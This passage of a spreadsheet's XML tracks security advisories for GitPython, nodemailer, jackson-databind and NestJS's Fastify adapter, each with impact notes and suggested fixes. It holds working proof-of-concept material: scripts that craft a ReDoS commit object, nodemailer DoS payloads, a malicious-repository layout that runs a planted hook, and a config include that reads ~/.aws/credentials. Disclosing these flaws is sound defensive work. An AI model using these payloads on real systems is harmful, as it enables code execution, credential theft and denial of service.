        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr"/>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>### Summary
`Repo.__init__` decides which directory is the git directory by testing candidate paths in an order that
considers the real `.git` **last**. Two earlier tests can be satisfied by ordinary tracked files. Git
reserves only the literal name `.git`, so `HEAD`, `objects/`, `refs/`, `config`, `gitdir`, `commondir`
and `hooks/` at a repository root are all legal tracked content.
Consequently, after a victim opens or clones an attacker's repository, GitPython resolves `git_dir` to
the **working-tree root** while real git correctly resolves `&lt;root&gt;/.git`. Everything GitPython then
treats as "inside the git directory" is attacker-authored content — including `hooks/`, which it
executes.
### CVE-2026-87817
### Affected code (3.1.59)
The discovery loop in `git/repo/base.py` tests, in order:
1. `git/repo/base.py:299` — `isfile(curpath/gitdir)` **and** `isfile(curpath/commondir)` **and** `isfile(curpath/HEAD)`
2. `git/repo/base.py:320` — `is_git_dir(curpath)`
3. `git/repo/base.py:341` — `dotgit = osp.join(curpath, ".git")` ← the real git dir, considered last
`is_git_dir` (`git/repo/fun.py:60`) requires only that `objects/` and `refs/` are directories and that
`HEAD` is a file; **`HEAD`'s contents are never parsed.** The hook path is resolved from
`index.repo.git_dir` (`git/index/fun.py:73`), i.e. the mis-resolved directory.
### Proof of concept
Requires only `pip install GitPython==3.1.59`. Full script attached as `poc1_rce.py`; it runs entirely
in a temp directory and the payload only writes a marker file.
Attacker repository — four ordinary tracked files at the root:
| path | mode | content |
|---|---|---|
| `gitdir` | 100644 | `.git\n` |
| `commondir` | 100644 | `.git\n` |
| `HEAD` | 100644 | `ref: refs/heads/master\n` |
| `hooks/pre-commit` | **100755** | `#!/bin/sh` + payload |
Victim — two ordinary calls:
```python
repo = git.Repo.clone_from(url, dst)     # or git.Repo(dst)
repo.index.commit("automated commit")    # code execution happens here
```
Observed on the PyPI release 3.1.59 (Linux and Windows):
```
real git says the git dir is : /tmp/.../victim/.git
GitPython says it is         : /tmp/.../victim      &lt;- shadowed
attacker's hook executed     : True
git fsck                     : (clean)
```
The `pre-commit` hook runs at `git/index/base.py:1201`, before `write_tree()`, so it fires even though
the commit later fails.
### Impact
A service that opens or clones an untrusted repository with GitPython — a CI runner building a fork
pull request, a code-scanning/SBOM service, a mirror, a dependency bot, an AI code-review/agent tool —
can be made to:
1. **Execute arbitrary commands** via the tracked `&lt;root&gt;/hooks/pre-commit` when the victim calls
   `index.commit()`.
2. **Read files outside the repository**: the tracked `&lt;root&gt;/config` becomes the repository config and
   is parsed with `merge_includes=True` (`git/repo/base.py:765`), so `[include] path = ~/.aws/credentials`
   discloses the file. (`Repo._config_reader` still defaults `merge_includes=True`, so the hardening
   added in 3.1.59 for `.gitmodules`/GHSA-7833 does not cover this path.)
3. **Write a config file to an attacker-chosen directory** via an absolute tracked `commondir`.
Delivery is silent: `git clone` exits 0, `git fsck` (including `--strict`, and with
`transfer.fsckObjects`/`fetch.fsckObjects=true`) reports nothing, and the clone passes every read-only
probe (`head.commit`, `branches`, `is_dirty()`, `untracked_files`, `iter_commits`) because a tracked
`commondir` of `.git` pins `common_dir` to the real `.git`.
### Threat model / preconditions
- Attacker controls the content of a repository the victim opens or clones with GitPython (public repo,
  fork PR, mirrored dependency).
- For code execution, the victim performs a commit via GitPython's native `index.commit()`. For the
  file-read impact, opening the repo and reading config is enough.
- `GIT_WORK_TREE` is **not** a mitigation — `git_dir` is assigned and the discovery loop breaks before
  the environment is consulted.
- Real git is unaffected; only GitPython mis-resolves the directory.
### Remediation
1. Test `curpath/.git` **before** the `gitdir`/`commondir`/`HEAD` triple and before `is_git_dir(curpath)`.
2. Resolve `hook_path` / `_commit_hook_path` / `_get_validated_reflog_path` through `repo.common_dir`.
3. Containment-check `commondir`/`gitdir` contents before joining (reuse
   `SymbolicReference._get_validated_path`).
4. Validate `HEAD` in `is_git_dir` (require `ref: refs/...` or a 40-hex sha).
5. Pass `merge_includes=False` in `Repo._config_reader` (`git/repo/base.py:765`).
### Note for the maintainers
Commit `406b98e1` (2026-05-31, "respect core.hooksPath for commit hooks") resolved the hook path via
`git rev-parse --git-path`, which is immune because git rediscovers the true `.git`. Commit `9bc287a2`
(2026-07-20) reverted it to avoid an unconditional `rev-parse` dependency — reintroducing the exec step.
Measured at each commit with the healthy-looking layout: `406b98e1` → hook did not fire; `9bc287a2` …
`3.1.59` → hook fired.
### Scope note
Only the **repository-root** case is reported: where a real `.git` exists, git prefers it, and GitPython
does not. A fake git dir in a subdirectory fools real git too, so that variant is out of scope as a
general ecosystem hazard rather than a GitPython defect.
###POC Files :
[poc1_rce.py](https://github.com/user-attachments/files/31388464/poc1_rce.py)
[poc2_file_read.py](https://github.com/user-attachments/files/31388465/poc2_file_read.py)</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D362" s="5" t="inlineStr"/>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M362" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr"/>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython's `Actor.name_email_regex` regular expression (`git/util.py`, line 863)
is vulnerable to catastrophic backtracking (ReDoS — Regular Expression Denial of
Service). When GitPython parses the `author` or `committer` header of a git commit
object that contains a long string with an unterminated `&lt;` (no matching `&gt;`), the
Python regex engine enters quadratic backtracking, causing complete single-threaded
CPU exhaustion proportional to the square of the input length.
A single crafted commit object can block any GitPython API call that reads
`.author` or `.committer` for **over two minutes per invocation**, enabling denial
of service against CI runners, code-hosting backends, repository-scanning
pipelines, or any service that processes commits from third-party or untrusted
repositories.
---
### Details
**Vulnerable file and line:**
`git/util.py`, line 863:
```python
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
```
This regex is evaluated inside `Actor._from_string()` (line 909) every time
GitPython resolves a commit's `.author` or `.committer` property.
**Full call chain — from public API to vulnerable sink:**
commit.author # any ordinary GitPython API call
└── git/objects/commit.py:917
Commit._deserialize()
└── git/objects/util.py:341
parse_actor_and_date(author_line)
└── git/util.py:909
Actor._from_string(string)
└── Actor.name_email_regex.search(string) ← VULNERABLE
`author_line` is decoded directly from the raw bytes of the git commit object with
**no length limit, character restriction, or timeout** applied at any point before
reaching the regex engine. The same chain is triggered by:
- `commit.author`
- `commit.committer`
- `repo.iter_commits()`
- `repo.blame()`
- Any web service / CI tool that displays or processes commit metadata
**Why this pattern backtracks catastrophically:**
The pattern `(.*) &lt;(.*?)&gt;` contains an unbounded greedy group `(.*)` followed by
a literal space and `&lt;`. When the input is a long string that contains `&lt;` but no
closing `&gt;`, the regex engine must try every possible split position for the greedy
group — O(n²) candidate positions for a string of length n — each of which then
drives the inner lazy group into further sub-match attempts. This is the
well-documented "catastrophic backtracking" failure mode for this family of
patterns.
**Empirically measured scaling (tested against GitPython 3.1.59, commit 52a6cba):**
| Author field length (bytes) | Time to resolve `.author` |
|-----------------------------|--------------------------|
| 1,000  | 0.0035 s |
| 5,000  | 0.084 s  |
| 10,000 | 0.341 s  |
| 20,000 | 1.525 s  |
| 40,000 | 5.963 s  |
| 60,000 | 13.360 s |
| 80,000 | 23.871 s |
| **200,000** | **150.488 s** |
Each doubling of input size roughly quadruples processing time (e.g. 40,000 →
80,000 bytes: 5.96 s → 23.87 s ≈ 4.0×), confirming O(n²) growth. Git itself
imposes **no practical size limit** on author name fields in the object format.
**How the malicious object reaches a victim:**
The PoC creates the commit object as a correctly SHA-1-hashed, zlib-compressed git
loose object written directly into `.git/objects/`. `git cat-file -t &lt;sha&gt;` confirms
it is a valid `commit` type and git's own read-side tools display it without error.
Only git's write-side tooling (`git commit --author`, `git update-index`,
explicit `git fsck`) applies the sanity checks that would reject a malformed author
line. Delivery paths that bypass those checks include:
- A git server with `receive.fsckObjects = false` (common in self-hosted deployments)
- A `.git` directory shipped as a tarball, backup, or zip archive
- A git bundle file
- Any automated mirror or import tool that operates at the object level
---
### PoC
**Environment used for testing:**
- GitPython 3.1.59, installed in editable mode from source (no code modifications)
- Python 3.12.3, git 2.43.0, Ubuntu 24.04
**Script 1 — craft the malicious repository (`craft_malicious_repo.py`):**
```python
#!/usr/bin/env python3
"""
Creates a git repository with one commit whose 'author' field is a large
string containing an unterminated '&lt;'. Bypasses git's write-side sanity
checks by writing the raw object directly into .git/objects/.
Usage: python3 craft_malicious_repo.py &lt;target_dir&gt; &lt;payload_size_bytes&gt;
"""
import hashlib, os, subprocess, sys, zlib
def run(cmd, cwd):
    return subprocess.run(cmd, cwd=cwd, check=True, capture_output=True, text=True)
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;target_dir&gt; &lt;payload_size_bytes&gt;")
        sys.exit(1)
    target_dir, payload_size = sys.argv[1], int(sys.argv[2])
    os.makedirs(target_dir, exist_ok=True)
    run(["git", "init", "--quiet"], cwd=target_dir)
    run(["git", "config", "user.email", "poc@example.com"], cwd=target_dir)
    run(["git", "config", "user.name", "PoC"], cwd=target_dir)
    with open(os.path.join(target_dir, "README.txt"), "w") as f:
        f.write("GitPython ReDoS PoC repository\n")
    run(["git", "add", "README.txt"], cwd=target_dir)
    tree_sha = run(["git", "write-tree"], cwd=target_dir).stdout.strip()
    malicious_name = "A" * payload_size
    # Key: author field contains a '&lt;' with no closing '&gt;'
    author_line    = f"author {malicious_name} &lt;unterminated 1691999972 -0700"
    committer_line = "committer PoC &lt;poc@example.com&gt; 1691999972 -0700"
    message        = "ReDoS PoC commit"
    commit_content = (
        f"tree {tree_sha}\n{author_line}\n{committer_line}\n\n{message}\n"
    ).encode()
    header     = f"commit {len(commit_content)}\x00".encode()
    store      = header + commit_content
    sha        = hashlib.sha1(store).hexdigest()
    compressed = zlib.compress(store)
    objdir = os.path.join(target_dir, ".git", "objects", sha[:2])
    os.makedirs(objdir, exist_ok=True)
    with open(os.path.join(objdir, sha[2:]), "wb") as f:
        f.write(compressed)
    run(["git", "update-ref", "refs/heads/master", sha], cwd=target_dir)
    print(f"Malicious commit sha : {sha}")
    print(f"Payload size         : {payload_size} bytes")
    verify = subprocess.run(
        ["git", "cat-file", "-t", sha],
        cwd=target_dir, capture_output=True, text=True
    )
    print(f"git cat-file -t confirms: {verify.stdout.strip()}")
if __name__ == "__main__":
    main()
```
**Script 2 — trigger the vulnerability (`trigger_redos.py`):**
```python
#!/usr/bin/env python3
"""
Opens the repository with GitPython and times commit.author access,
which triggers Actor._from_string() -&gt; Actor.name_email_regex.search().
Usage: python3 trigger_redos.py &lt;repo_dir&gt; &lt;commit_sha&gt;
"""
import sys, time, git
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;repo_dir&gt; &lt;commit_sha&gt;")
        sys.exit(1)
    repo   = git.Repo(sys.argv[1])
    commit = repo.commit(sys.argv[2])
    print("Accessing commit.author — triggers Actor._from_string()...")
    t0     = time.time()
    author = commit.author          # ← this single line causes the hang
    elapsed = time.time() - t0
    print(f"Author name length : {len(author.name)} chars")
    print(f"Elapsed            : {elapsed:.3f} seconds")
    print("RESULT: VULNERABLE" if elapsed &gt; 5 else "RESULT: not triggered")
if __name__ == "__main__":
    main()
```
**Execution and observed output:**
$ python3 craft_malicious_repo.py /tmp/victim-repo 200000
Malicious commit sha : 2450fbd5ab5ebfff430dab183d25678df9fd20de
Payload size : 200000 bytes
git cat-file -t confirms: commit
$ python3 trigger_redos.py /tmp/victim-repo 2450fbd5ab5ebfff430dab183d25678df9fd20de
Accessing commit.author — triggers Actor._from_string()...
Author name length : 200014 chars
Elapsed : 150.488 seconds
RESULT: VULNERABLE
**Docker reproduction (fully isolated environment):**
```bash
docker run --rm -it -v ~/gitpython-poc:/work -w /work python:3.8-bookworm bash
# Inside the container:
apt-get update &amp;&amp; apt-get install -y git
git clone --depth 1 https://github.com/gitpython-developers/GitPython.git /work/GitPython
pip install -e /work/GitPython
python3 /work/poc/craft_malicious_repo.py /work/victim-repo 200000
# note the SHA printed, then:
python3 /work/poc/trigger_redos.py /work/victim-repo &lt;SHA&gt;
```
The `python:3.8-bookworm` base image matches the one used in GitPython's own
`fuzzing/local-dev-helpers/Dockerfile`.
---
### Impact
**Who is affected:**
Any application that uses GitPython to parse commits from a source it does not
fully control. High-risk deployments include:
- **CI/CD systems** (Jenkins, GitLab CI, GitHub Actions self-hosted runners, etc.)
  that clone and inspect third-party pull requests — one malicious commit in a PR
  can stall every worker that processes it.
- **Code-hosting or code-review web services** that render commit author information
  — a single crafted push blocks every page render or API response that touches that
  commit's metadata.
- **Security or compliance scanners** that walk repository history across many
  repositories — one crafted object in any repository exhausts a scanner worker.
**Severity of impact:**
A 200 KB author field blocks a process for ~150 seconds per single `.author`
access. When `iter_commits()` or `blame` are used, every commit in a history
traversal can be independently crafted, multiplying the total hang time by the
number of commits processed. There is no confidentiality or integrity impact —
this is a pure availability / resource-exhaustion vulnerability.
---
### Suggested Fix
Replace the vulnerable pattern with one that cannot backtrack catastrophically.
The minimal, behavior-preserving fix is to exclude `&lt;` and `&gt;` from the name
group, removing the ambiguity that forces O(n²) backtracking:
```python
# git/util.py, line 863
# Before (vulnerable):
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
# After (fixed — identical output for all well-formed input):
name_email_regex = re.compile(r"([^&lt;&gt;]*) &lt;([^&lt;&gt;]*)&gt;")
```
Because the name group can no longer itself contain a `&lt;` character, the engine
has exactly one candidate position to try when a closing `&gt;` is absent — and fails
in O(n) time instead of O(n²). Legitimate actor strings (`Name &lt;email&gt;`) never
contain `&lt;` or `&gt;` in either field, so this change produces identical results for
all valid input.
As defense in depth, independently of the regex fix, bounding the maximum number
of characters GitPython will attempt to parse in an author/committer line (e.g.
rejecting strings longer than 4096 bytes before passing them to any regex) would
further limit the blast radius of any future ReDoS class in this parser.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90776</t>
        </is>
      </c>
      <c r="D363" s="5" t="inlineStr"/>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M363" s="5" t="inlineStr">
        <is>
          <t>10.0.5</t>
        </is>
      </c>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr"/>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>### Summary
`nodemailer/lib/addressparser` parses one shape of address in O(n^2) time. A single ~640 KB address value blocks the Node.js event loop for roughly 7 seconds. And it is reachable without auth: mailparser feeds inbound email headers straight into this parser, so one crafted email is enough to stall a service that parses mail.
### Details
The parser builds a single address by accumulating its atoms into one string. When the atoms are separated by RFC 5322 comments, like `a@b(c)@b(c)@b(c)...`, every atom re-joins that same growing string.
The join check in `src/addressparser/index.ts`:
```js
const joins =
    prevToken &amp;&amp;
    prevToken.noBreak &amp;&amp;
    parts.length &amp;&amp;
    (prevToken.value !== ')' || parts[parts.length - 1].slice(-1) === '@' || token.value.charAt(0) === '@');
```
The issue is the order of the last two operands. `parts[parts.length - 1].slice(-1)` runs before the cheap `token.value.charAt(0)`. `slice(-1)` has to flatten the accumulator to read its last character → O(current length) → and that runs on every token → O(n^2) over the whole value. Since `||` is left to right, the cheap `charAt(0)` that would short-circuit never gets the chance.
The chain: long comment-joined address → one growing accumulator → `slice(-1)` re-flattens it on every token → quadratic parse time.
### PoC
Isolated, just the parser (`npm i nodemailer@10.0.3`):
```js
const addressparser = require('nodemailer/lib/addressparser');
const s = Date.now();
addressparser('a' + '@b(c)'.repeat(130000));
console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
```
End to end through mailparser, the remote path (`npm i mailparser@3.9.24`):
```js
const { simpleParser } = require('mailparser');
(async () =&gt; {
  const to = 'a' + '@b(c)'.repeat(130000);
  const eml = `From: a@b.com\r\nTo: ${to}\r\nSubject: x\r\n\r\nhi\r\n`;
  const s = Date.now();
  await simpleParser(eml);
  console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
})();
```
Timings measured on 10.0.3:
| Address value | Parse time |
| --- | --- |
| 390 KB | 1.3 s |
| 585 KB | 5.6 s |
| 640 KB | 6.7 s |
| 976 KB | 18 s |
It survives RFC 5322 folding: fold the header at offsets that are a multiple of the atom length and every `)`+`@` junction stays intact, so the payload is a standards-compliant email with lines under 998 octets and still triggers it.
### Impact
Algorithmic-complexity DoS. Node is single threaded, so the block stalls everything else in the process, and a handful of these back to back keeps a service down.
Affected: anything that runs `addressparser` on attacker-controlled input, either the public export directly or address headers built from user input. The unauthenticated remote case is mailparser. 3.9.24 pins nodemailer 10.0.3 and calls the parser on inbound `To`/`From`/`Cc` with no length cap, so any service parsing inbound mail with it can be frozen by a single email.
### Suggested fix
Swap the last two operands so the cheap check runs first:
```js
(prevToken.value !== ')' || token.value.charAt(0) === '@' || parts[parts.length - 1].slice(-1) === '@')
```
Pure boolean commutation, so the parse output is identical. Verified byte for byte on the test inputs, and the full 1276-test suite passes.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90776</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91776</t>
        </is>
      </c>
      <c r="D364" s="5" t="inlineStr"/>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M364" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr"/>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>### Summary
With `@JsonTypeInfo(use = Id.NAME, defaultImpl = ...)`, every distinct unknown
raw type ID selects the same fallback deserializer but is retained as a
separate key in `TypeDeserializerBase._deserializers`. An attacker who can
repeatedly supply new unknown type IDs can grow this process-lifetime cache
without a configured bound.
### Details
The affected path is `TypeDeserializerBase._findDeserializer()`. After an
unknown name-based type ID resolves to the configured fallback/default
implementation, jackson-databind caches the result under the attacker-provided
raw `typeId`. Although all such IDs select the same fallback deserializer, each
new string remains a distinct cache key.
The behavior is runtime-confirmed in jackson-databind 2.22.1 and 3.2.1.
Current 2.22 and 3.2 source branches retained the unbounded `_deserializers`
map and per-raw-ID cache write when rechecked. The earlier affected floor has
not been established, patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must enable name-based polymorphism with a
`defaultImpl` or equivalent fallback, accept attacker-influenced type IDs, and
reuse a long-lived mapper/type deserializer across requests.
Suggested correction: avoid caching each unknown raw ID when every such ID
resolves to the same fallback, use a fallback sentinel, or use an explicitly
bounded concurrency-safe cache. A regression should contrast many distinct
unknown IDs with repetitions of one unknown ID across requests.
### PoC
Configure a polymorphic base type with
`@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, defaultImpl = Fallback.class)` and
deserialize inputs containing unknown type names through the same mapper.
Inspect `TypeDeserializerBase._deserializers` after the run.
On affected 2.x and 3.x versions, 10,000 distinct unknown raw type IDs produce
10,000 retained cache entries even though every input selects the same
fallback deserializer. A matched control that repeats one unknown ID 10,000
times produces one retained entry. This isolates attacker-controlled key
cardinality from ordinary request count.
### Impact
Where the stated polymorphic fallback configuration is exposed to
attacker-influenced type IDs, distinct inputs cause incremental
process-lifetime memory retention and eventual availability pressure or
denial of service. This is not claimed as a single-request allocation spike,
and no fixed bytes-per-ID or time-to-out-of-memory value is asserted. No
confidentiality, integrity, or code-execution impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91776</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91777</t>
        </is>
      </c>
      <c r="D365" s="5" t="inlineStr"/>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M365" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr"/>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>### Summary
When an `@JsonIdentityInfo` collection or map first creates N unresolved
object-ID references and later resolves the same IDs in reverse order,
jackson-databind scans the remaining pending-reference accumulator for each
resolution. A shallow JSON document whose size grows linearly can therefore
cause quadratic CPU work during deserialization.
### Details
The affected path is forward-reference completion in
`CollectionDeserializer.CollectionReferringAccumulator.resolveForwardReference()`
and the corresponding map implementation. The implementation performs a
linear search of the pending accumulator for every resolved object ID.
The behavior is runtime-confirmed in jackson-databind 2.5.0, 2.22.1, and
3.2.1. Current 2.22 and 3.2 source branches retained the same design when
rechecked. A 2.4.0 control fails closed before successful reverse-order
completion, so 2.5.0 is the conservative runtime-confirmed affected floor.
The patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must deserialize attacker-influenced JSON into an
identity-enabled collection or map. The issue does not require deep nesting or
syntactically unusual JSON.
Suggested correction: replace repeated linear lookup/removal with a keyed
pending-reference structure or another design that provides linear or
amortized-linear completion. A regression should preserve input order,
duplicate-ID behavior, and unresolved-ID errors while bounding reverse-order
resolution work.
### PoC
The proof constructs a shallow collection containing N unresolved
`@JsonIdentityInfo` references followed by definitions of those same IDs in
reverse order. Its ID class counts `equals()` calls, giving a deterministic
work measure rather than a timing-dependent result.
With N=2,000, affected versions perform exactly 2,003,000 ID comparisons. An
equally sized control in which every reference is already resolved performs
zero comparisons in the pending-reference lookup path. The run is bounded to
a 512 MiB JVM. The result demonstrates quadratic growth: approximately
`N * (N + 1) / 2` comparisons, plus fixed setup comparisons.
### Impact
An unauthenticated source that can submit JSON to an application using the
affected identity-enabled collection or map shape can consume quadratic CPU
and exhaust a request-time or worker-capacity budget, causing denial of
service. The application model/configuration prerequisite is material. No
confidentiality, integrity, code-execution, or parser-depth impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91777</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>GHSA-9c5c-9qcx-q35q</t>
        </is>
      </c>
      <c r="D366" s="5" t="inlineStr"/>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr">
        <is>
          <t>npm:@nestjs/platform-fastify</t>
        </is>
      </c>
      <c r="M366" s="5" t="inlineStr">
        <is>
          <t>11.2.4, 12.0.2</t>
        </is>
      </c>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr"/>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>| Field | Value |
| --- | --- |
| Ecosystem | npm |
| Package | `@nestjs/platform-fastify` |
| Affected versions | `&gt;= 12.0.0, &lt; 12.0.2` and `&lt; 11.2.4` |
| Patched versions | `12.0.2` and `11.2.4` (upgrade to `12.0.3` / `11.2.5`) |
### Summary
On the Fastify adapter, an HTTP request that uses an **absolute-form request target** (`GET http://host/path HTTP/1.1`
instead of `GET /path HTTP/1.1`) reaches the route handler without running the path-scoped Nest middleware bound to
that route. Applications that enforce authentication or authorization in middleware execute the protected handler
with those checks skipped.
### Impact
Any application that
- uses `@nestjs/platform-fastify`, and
- binds middleware to specific paths via `MiddlewareConsumer.forRoutes(...)` or `.exclude(...)`, and
- is reachable by a client that controls the raw request line.
Node's HTTP server accepts absolute-form targets, so no special server configuration is needed. Exposure is reduced
when a reverse proxy in front of the application rewrites the request target to origin-form, which most do.
Where the bypassed middleware performs authentication or authorization, the result is an authentication or
authorization bypass. Where it performs logging, rate limiting or body handling, those are silently skipped instead.
### Details
Fastify's router (`find-my-way`) resolves an absolute-form target to its path before matching, so the route handler
